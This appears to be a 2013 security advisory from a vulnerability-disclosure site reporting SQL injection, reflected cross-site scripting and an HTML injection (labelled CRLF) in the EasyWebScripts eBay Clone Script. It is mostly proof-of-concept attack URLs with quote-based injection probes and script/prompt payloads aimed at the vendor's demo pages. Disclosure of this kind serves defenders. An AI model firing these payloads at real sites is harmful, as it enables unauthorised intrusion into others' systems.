EasyWebScripts eBay Clone Script, Multiple Vulnerabilities

2013.02.23
Credit: 3spi0n
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

EasyWebScripts eBay Clone Script, Multiple Vulnerabilities Software Page: http://easywebscripts.com/product_details.php?item_id=10 Script Demo: http://easywebscripts.com/ebay Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhatz Inc. and Janissaries Platform. [1] MySQL Injection on Script [+] (gallery.php, cid Param) >>> http://eXXXs.com/ebay/gallery.php?cid=1' (MySQLi Found) [+] (product_desc.php, id Param) >>> http://easywebscripts.com/ebay/product_desc.php?id=1' (MySQLi Found) [+] (showcategory.php, cid Param) >>> http://easywXs.com/ebay/showcategory.php?cid=536' (MySQLi Found) [2] Cross Site Scripting (XSS) on Script [+] (lostpassword.php, msg Param) >>> http://easXXts.com//ebay/lostpassword.php?msg='"()%26%251<script>prompt(99456454)</script> [+] (showcategory.php, pg Param) >>> http://easXXpts.com//ebay/showcategory.php?cid=0&pg='"()%26%251<script>prompt(54648451)</script>&type=6 [+] (signinform.php, msg Param) >>> http://easywXXipts.com/ebay/signinform.php?msg='"()%26%251<script>prompt(54648451)</script> [3] CRLF injection/HTTP response splitting on Script [+] (signinform.php, msg Param) >>> http://easywXXscripts.com//ebay/signinform.php?msg=<h1><marquee>Inj3ct3d by 3spi0n</marquee></h1>

References:

http://easywebscripts.com/product_details.php?item_id=10


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top